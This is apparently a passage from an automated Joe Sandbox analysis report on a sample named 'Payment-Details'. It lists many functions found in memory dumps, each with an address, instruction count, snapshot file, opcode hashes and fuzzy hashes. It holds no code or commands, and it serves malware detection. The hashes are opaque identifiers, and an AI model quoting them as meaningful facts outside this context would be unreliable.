                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ae850a1c7a92e5f415ebc2114ad2d7e879b9a2b57407173763f144b32d7fda5
                                        • Instruction ID: ac9f93db593d4e62ec9f69fb1730ed95303dc3aa93df46fcc38741f9f627aa9e
                                        • Opcode Fuzzy Hash: 0ae850a1c7a92e5f415ebc2114ad2d7e879b9a2b57407173763f144b32d7fda5
                                        • Instruction Fuzzy Hash: 154163B4B20615DFCB14AB64C494AAE77BBFFC9700F104119D406AB394DF74AD06CB92
                                        Function 070E2288 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6a468f8ea02748d95fd34e318ee5b3baf7ff6e4e6459b69c3c2b8bc13ffb344
                                        • Instruction ID: 7558d8b8654bb57926c1804d4b70833a1bdd860bdac811b06e414c9aa813b782
                                        • Opcode Fuzzy Hash: f6a468f8ea02748d95fd34e318ee5b3baf7ff6e4e6459b69c3c2b8bc13ffb344
                                        • Instruction Fuzzy Hash: F45104B4E00608EFCB44DFA9D998AADBBFAFF49300F10816AE915A7360DB345945CF50
                                        Function 070E2298 Relevance: .1, Instructions: 128COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b418337c30c26e334289289047ebc5ff6c5133074da2d50eec2e093acc7cf83b
                                        • Instruction ID: 9045494b6f64f3dbf7f3ec886a49d865e1d57d0c646f69ff450ea52c6f579e87
                                        • Opcode Fuzzy Hash: b418337c30c26e334289289047ebc5ff6c5133074da2d50eec2e093acc7cf83b
                                        • Instruction Fuzzy Hash: C751E6B4E01608EFCB44DFA9D588AADBBFAFF49300F108169E916A7360DB745945CF50
                                        Function 07236448 Relevance: .1, Instructions: 125COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7321ce8d8cf3a1b909f90502a32e391019e5c4ee525147f183160860be18658a
                                        • Instruction ID: 4200f3bac4374798362969a85bf5a854c922b446f64f43f170c75c103c9959f7
                                        • Opcode Fuzzy Hash: 7321ce8d8cf3a1b909f90502a32e391019e5c4ee525147f183160860be18658a
                                        • Instruction Fuzzy Hash: 5841ACB1F14716AFDB34CB79D54429FB7F6AF84610B04896ED15ACBB90DA34E840CB81
                                        Function 072369C0 Relevance: .1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e035f7585cc0bb102f00d87b4a53b5347bd7a6def4d8c97f2f55eead5055ebcc
                                        • Instruction ID: 98cca4ba8c0c91e0ff493db0043b1adaae17c60634f38ea8845aaef5690dd7f9
                                        • Opcode Fuzzy Hash: e035f7585cc0bb102f00d87b4a53b5347bd7a6def4d8c97f2f55eead5055ebcc
                                        • Instruction Fuzzy Hash: 2041F6B0B04346AFCB119B68D8057DEBFFAEF86700F10815AE555DB790DB30A905CB91
                                        Function 07236878 Relevance: .1, Instructions: 122COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b53b19ef029a721ad85d2d4751bc590d1af32e7b21f5a3613a3ee6abe4913a6
                                        • Instruction ID: 99e031f8fb6cad87dab130daa0a8c3d4a9bdff3e6aa8c86371a78238bc1b5a57
                                        • Opcode Fuzzy Hash: 6b53b19ef029a721ad85d2d4751bc590d1af32e7b21f5a3613a3ee6abe4913a6
                                        • Instruction Fuzzy Hash: 2C419DB1A00746EFCB21CF69C944A6AFBF2BF88300F18899DD48697A51D730E909CF51
                                        Function 019F4E40 Relevance: .1, Instructions: 117COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 641d04c6f648c58141d05d48dfc4e3dc42d0f9cc807d1cdb4b3edb9b2f56117d
                                        • Instruction ID: e63ed490dda27ce177d5d077af3736510ce20741009a066965a47b1ddbe4d5eb
                                        • Opcode Fuzzy Hash: 641d04c6f648c58141d05d48dfc4e3dc42d0f9cc807d1cdb4b3edb9b2f56117d
                                        • Instruction Fuzzy Hash: 345153B0D05348DFEB11DFA9C884ACDBFB5BF49710F25805AD408AB251D7706A4ACF90
                                        Function 070EB9C8 Relevance: .1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb4ac77e92b3ec85e6ec65a266323b760d6b3ef35f85366d73964cdf1cae28d6
                                        • Instruction ID: 03d716646a37e7882f1e8214679972d4cc7bd05573cdf50951ce6b5a68354ff8
                                        • Opcode Fuzzy Hash: bb4ac77e92b3ec85e6ec65a266323b760d6b3ef35f85366d73964cdf1cae28d6
                                        • Instruction Fuzzy Hash: 0F51E5B0E01208CFDB68DFB9D854AADBBF6FF49300F20812AD416AB264DB755941CF40
                                        Function 070EB9B8 Relevance: .1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1450e17182ecb8bbef438c7e307c9ce5929b49a1ac9bc10441ee6bd550be5d1e
                                        • Instruction ID: 166cf7bb41e6df6fc7ec16cf255546415edb2aa0ab52a9fd3e7bce414afc2af9
                                        • Opcode Fuzzy Hash: 1450e17182ecb8bbef438c7e307c9ce5929b49a1ac9bc10441ee6bd550be5d1e
                                        • Instruction Fuzzy Hash: BE41D3B0E01209DFCB68DFB9D454A9DBBF6FF89300F20812AD416AB265DB759941CF50
                                        Function 07231960 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd73b27c2d6d8f6816bb2105c4c1994042f7a07e4e03acd93b908e4ac34deaaf
                                        • Instruction ID: 0c7b1e5c41d4279622033a0a15949af9c2a5f4655bfdae2645b5eaa6fe26d89d
                                        • Opcode Fuzzy Hash: cd73b27c2d6d8f6816bb2105c4c1994042f7a07e4e03acd93b908e4ac34deaaf
                                        • Instruction Fuzzy Hash: 82415AB17006159FD308DB69C854B2BB7E6AFCDB01F104169E20A8B3A1DF75EC42C791
                                        Function 0723FC99 Relevance: .1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd07f9cc8f0b1938750785e55517af8e73b8f8b17df60207dd0d96dc01fb617d
                                        • Instruction ID: dbcc8c2d80800807bd196d862d4038ef526a62155a63a4f049f47e4ff47a4329
                                        • Opcode Fuzzy Hash: dd07f9cc8f0b1938750785e55517af8e73b8f8b17df60207dd0d96dc01fb617d
                                        • Instruction Fuzzy Hash: 56413AB1D10609DFDB04DFA8E8546EDFBB5FF89300F108A2AE919B7210EB706985CB50
                                        Function 07231970 Relevance: .1, Instructions: 109COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2356d37ae4bb37b9aa6b54e6204e04209ec9b97029af06897558fea6d59f0dd7
                                        • Instruction ID: b3b645679596de030ddb7abd871e689745a38023507f2a51a6bd9694184c4ca2
                                        • Opcode Fuzzy Hash: 2356d37ae4bb37b9aa6b54e6204e04209ec9b97029af06897558fea6d59f0dd7
                                        • Instruction Fuzzy Hash: B93158B13006159FD308DB69C854B2BB7EAAFCCB01F104168E60A8B3A1DF75EC42CB91
                                        Function 0723FCA8 Relevance: .1, Instructions: 107COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 738377e3baab60a34423e95eceadd488c96a293f636693d0dd5fa0b26aaebab0
                                        • Instruction ID: 79ae0dec8785e7053f1023ac9ced6058b9a2e80324171b5132691a4e0b9b8614
                                        • Opcode Fuzzy Hash: 738377e3baab60a34423e95eceadd488c96a293f636693d0dd5fa0b26aaebab0
                                        • Instruction Fuzzy Hash: 05413DB1D20619DFCB04DFA9E9546EDF7B5FF89300F108A2AE919B7210EB706985CB50
                                        Function 07256A90 Relevance: .1, Instructions: 104COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce78465c8d0bf72f06c97c31d9a424d03eeeb7ea5b51a02255678c5011f6322a
                                        • Instruction ID: 1036fc1316be32fe7d769821650c5dc6e0d7abe6f494dc260114536ba6fc63db
                                        • Opcode Fuzzy Hash: ce78465c8d0bf72f06c97c31d9a424d03eeeb7ea5b51a02255678c5011f6322a
                                        • Instruction Fuzzy Hash: AF4117B4D10219CFDB64DFA9D895BADBBB6FB49310F5080A9D909A3350EB345E84CF50
                                        Function 07230A70 Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f5c57fb6ec926e93a4795bdb218a8999845c02c20bec18e0b13cd71fb6c4046
                                        • Instruction ID: e6e816227107d728dc1c0af83c6228b7998466a6bc899df3204715095eff8336
                                        • Opcode Fuzzy Hash: 4f5c57fb6ec926e93a4795bdb218a8999845c02c20bec18e0b13cd71fb6c4046
                                        • Instruction Fuzzy Hash: 6A3116766101059FCB14CF58D898EA9BBB6FF48320F1640A8E6099B372C731EC51CB50
                                        Function 0725B598 Relevance: .1, Instructions: 101COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e3dd449ba35cf760f322f3d1905016c95671129eff1eab56e5ef825f1edaf0c
                                        • Instruction ID: c1fbd72a53ddc74f70beffb3e02f923b133929d8fa26cf9ccba369922b0ad639
                                        • Opcode Fuzzy Hash: 1e3dd449ba35cf760f322f3d1905016c95671129eff1eab56e5ef825f1edaf0c
                                        • Instruction Fuzzy Hash: D34198B0A102168FDB14CFA5C9446BFBBF1FF88351F01862AE905E7291D734D945CB90
                                        Function 07233858 Relevance: .1, Instructions: 100COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbfbeceff267f8a561ebd851fe5b1488022478b56085618afa99500261c2c9f3
                                        • Instruction ID: 9347a001206de42376e272784c109b9347bb895087d791e84036625c087d0547
                                        • Opcode Fuzzy Hash: bbfbeceff267f8a561ebd851fe5b1488022478b56085618afa99500261c2c9f3
                                        • Instruction Fuzzy Hash: 8D316F75A10119DBDF14DFA4D854AEEB7B6FF88321F208025E851B7390CB31AE05CBA0
                                        Function 019F4E6C Relevance: .1, Instructions: 99COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa8d8d904014731420bfe3b0bf2407ffd64ed83d3da182fd428603a15b78634f
                                        • Instruction ID: 60fdecda94b23229cd693b90e7ec7fc79fd624291807dbfd6d7bd48cfd7f9e3d
                                        • Opcode Fuzzy Hash: fa8d8d904014731420bfe3b0bf2407ffd64ed83d3da182fd428603a15b78634f
                                        • Instruction Fuzzy Hash: F141D1B1D0030DDBEB24DFAAC984A8DFBB5BF48710F65842AD508AB250D7756A46CF90
                                        Function 019F5668 Relevance: .1, Instructions: 99COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbde9738da19ac6b63df6e837bc3e4f2e5128e8f6b66a8d8e33972180cbb1d23
                                        • Instruction ID: 107a9bfa82ff8de9eab6859b01d56ee2b65472516446ff3120f16d24998c46d3
                                        • Opcode Fuzzy Hash: fbde9738da19ac6b63df6e837bc3e4f2e5128e8f6b66a8d8e33972180cbb1d23
                                        • Instruction Fuzzy Hash: DC41F3B1D00309DFDB20DFAAC984ACDFBB5BF48711F65802AD508AB250D7756A86CF90
                                        Function 07257760 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e2ca881a13ea8ea197bdee2f3693f6013a80afbbcea9526801096d5f6e963ec7
                                        • Instruction ID: 8015239b18290ad1135fdd0cdece6eaeb8d331745a33677eb8ad9cee75ea4090
                                        • Opcode Fuzzy Hash: e2ca881a13ea8ea197bdee2f3693f6013a80afbbcea9526801096d5f6e963ec7
                                        • Instruction Fuzzy Hash: 894115B4E1420ACFDB04CFAAD8457AEBBF6FB89300F108065D919A7355E7785981CFA1
                                        Function 0725BF50 Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e0570a46bd6398e638f32e167c0f2e576a3973c08f489cd5a5baaa08aecd12d
                                        • Instruction ID: 3c3e0e4b5bd5f982401415f3a655c50f21841d65cd102a355a535335ae904b6e
                                        • Opcode Fuzzy Hash: 1e0570a46bd6398e638f32e167c0f2e576a3973c08f489cd5a5baaa08aecd12d
                                        • Instruction Fuzzy Hash: 4C41E3B4A11229CFEB24DB24C891FA9B7B1FF59310F1041D9EA09AB391D631ED81CF50
                                        Function 0725A268 Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34b65b6819eaecae156798feafa07911bdf6420b6d57804a33bcfeb5ccf60ebd
                                        • Instruction ID: 2e8df80b52de90a0b0db538150373240a40cfc466d821b0c02d61498a65f5cb6
                                        • Opcode Fuzzy Hash: 34b65b6819eaecae156798feafa07911bdf6420b6d57804a33bcfeb5ccf60ebd
                                        • Instruction Fuzzy Hash: 03213C75304206AFDB049F69D844AAEBFABEFC9320B54813AE908CB351DF728C15C790
                                        Function 070EED5A Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24e25042541309aa82b597c8960293010e2e3c6ae761099be50f60a09a0740a4
                                        • Instruction ID: 700d41958ba317346bc1a9bc8626182ce6b47a6dd3ed5cbe3e61a8c4010363a3
                                        • Opcode Fuzzy Hash: 24e25042541309aa82b597c8960293010e2e3c6ae761099be50f60a09a0740a4
                                        • Instruction Fuzzy Hash: 6A318475B00105EFCF049FA4C854A59BBBAFF8C310B1541AAEA099B361DB31EC52CB90
                                        Function 0725674B Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ff6babd3257165bbca4817c60d77e7038be28307bf0a0845902ab975be9e2d0
                                        • Instruction ID: 171a4e956c4619cb2bc2e4d795d45bd74f80352f461ff1b0ef0e24d5b067939f
                                        • Opcode Fuzzy Hash: 8ff6babd3257165bbca4817c60d77e7038be28307bf0a0845902ab975be9e2d0
                                        • Instruction Fuzzy Hash: F93106B0D25209CFDB00CFA9D948BEEBBF6EB89300F50806AD914B7251D3755984CB91
                                        Function 072596E9 Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1032369675a6f705fa89a3e802eebffbfb433ba7c7e0c1406ee4d40d9c8fec6
                                        • Instruction ID: fbeee4895adcf846ab90d8367bce3d11fed6d121cfc7db0b41fcb8ccfb1d301f
                                        • Opcode Fuzzy Hash: f1032369675a6f705fa89a3e802eebffbfb433ba7c7e0c1406ee4d40d9c8fec6
                                        • Instruction Fuzzy Hash: 3831C1707103069FDB00DF78E8557AEBBEAFB89304F008669D449CB685DBB569058BE1
                                        Function 0723DEAC Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60631c2da6edffd87b79fcbf5e24c30d47310f5a487448524531c3ac323e3727
                                        • Instruction ID: ffe96b5fd54f4cac345c76a5d12416434bb9064a21ad9d431de2f2735f263d7c
                                        • Opcode Fuzzy Hash: 60631c2da6edffd87b79fcbf5e24c30d47310f5a487448524531c3ac323e3727
                                        • Instruction Fuzzy Hash: BC41D2B4E18228CFDBA4CFA8D994BE9B7B5AB4A300F5081E9D50DA7340DB745E84CF11
                                        Function 019F0E00 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4bd46f1e96d736b72d8df8296370be0c51e284484d5832a15c7725de4224407
                                        • Instruction ID: 67380f0ec757cd0f45d55aca2ed034e43d4b0820d5ac3efc18b368d48b9792ff
                                        • Opcode Fuzzy Hash: a4bd46f1e96d736b72d8df8296370be0c51e284484d5832a15c7725de4224407
                                        • Instruction Fuzzy Hash: A431A130B0054AABDF15EFAAC8546ADBAFBAFD4310F1C446DE109E7342DB3099428B45
                                        Function 0723CDD8 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 852a8c838f1e27e28c780965ca34112f400de169d0eb61ccdbb2eb6b8cb2b77e
                                        • Instruction ID: e8328db00587fb738b3a49f99e89f273aa7c16ebcc44eaa773c9e4548485df21
                                        • Opcode Fuzzy Hash: 852a8c838f1e27e28c780965ca34112f400de169d0eb61ccdbb2eb6b8cb2b77e
                                        • Instruction Fuzzy Hash: BF31F7B5E112499FCB04CFA9D894AEEBBF1EF49300F108166E915B7360DB70A941DF60
                                        Function 07257770 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b726e3d171eae4c71a20679d3f1cfedfcfd40ec11dd70aaa4cab33bf69dab2d
                                        • Instruction ID: 4060d1d30d3cf43c9685eaf0058797a9d3ee3347dcb1d6a716eaf4127c913002
                                        • Opcode Fuzzy Hash: 8b726e3d171eae4c71a20679d3f1cfedfcfd40ec11dd70aaa4cab33bf69dab2d
                                        • Instruction Fuzzy Hash: B731E2B4E60209CBDB44CFAAD844BAEBBF6FB89300F108065D919A7354D7785981CFA1
                                        Function 0752E878 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b4533247e70e386bc1084c5852bf5ae819b135d347c6ed421be5aa51546c10d
                                        • Instruction ID: f80914a3056df260fa1b8f7e9230856f7bd59b173e4e2f00dec02301f42e73e6
                                        • Opcode Fuzzy Hash: 1b4533247e70e386bc1084c5852bf5ae819b135d347c6ed421be5aa51546c10d
                                        • Instruction Fuzzy Hash: F521B7723046618FE3248A69D449696BB99FFC2321B19817BE58DC7291CB31E803D751
                                        Function 07233F00 Relevance: .1, Instructions: 88COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 534c4694c91c329d86d5a394911a4e6ffecd2d688de6066073862e6a1dcfe0a4
                                        • Instruction ID: 5603cd81ce218c9da03197b739cb76fa42a24f4a7eaf0feeb27994a92ace1072
                                        • Opcode Fuzzy Hash: 534c4694c91c329d86d5a394911a4e6ffecd2d688de6066073862e6a1dcfe0a4
                                        • Instruction Fuzzy Hash: AC2127713043049FD705EBB9D8405AEBBEAEFC620075085AAE809CF355DF349D0587E2
                                        Function 07231F5A Relevance: .1, Instructions: 88COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8514f4934f5012af677159082f7e498d7cd14716acfdfa45b5daf4cd3931149f
                                        • Instruction ID: 3b10643a45f57fb5361494641c6d993ebe5fec9f4fe2f6cc4661533d5eb4cac7
                                        • Opcode Fuzzy Hash: 8514f4934f5012af677159082f7e498d7cd14716acfdfa45b5daf4cd3931149f
                                        • Instruction Fuzzy Hash: 7521C5B0B10256DFCB14AB64C4A46AEB7EBBFC9710F244019D406DB394DF745C06D781
                                        Function 019F0E10 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9825c8fd63e5a00d0362eecaa49d869b105200ef69530e1f2dcf23877ac93c71
                                        • Instruction ID: 0ff333e84805c4446d4d33784e970529237bd06a3f93fe9d1961e159f0d2f20b
                                        • Opcode Fuzzy Hash: 9825c8fd63e5a00d0362eecaa49d869b105200ef69530e1f2dcf23877ac93c71
                                        • Instruction Fuzzy Hash: 52318430B0014A9BDF15EFA9C8546ADBAFBAFD4310F18446DE509E7352DF7059428B81
                                        Function 07256920 Relevance: .1, Instructions: 86COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
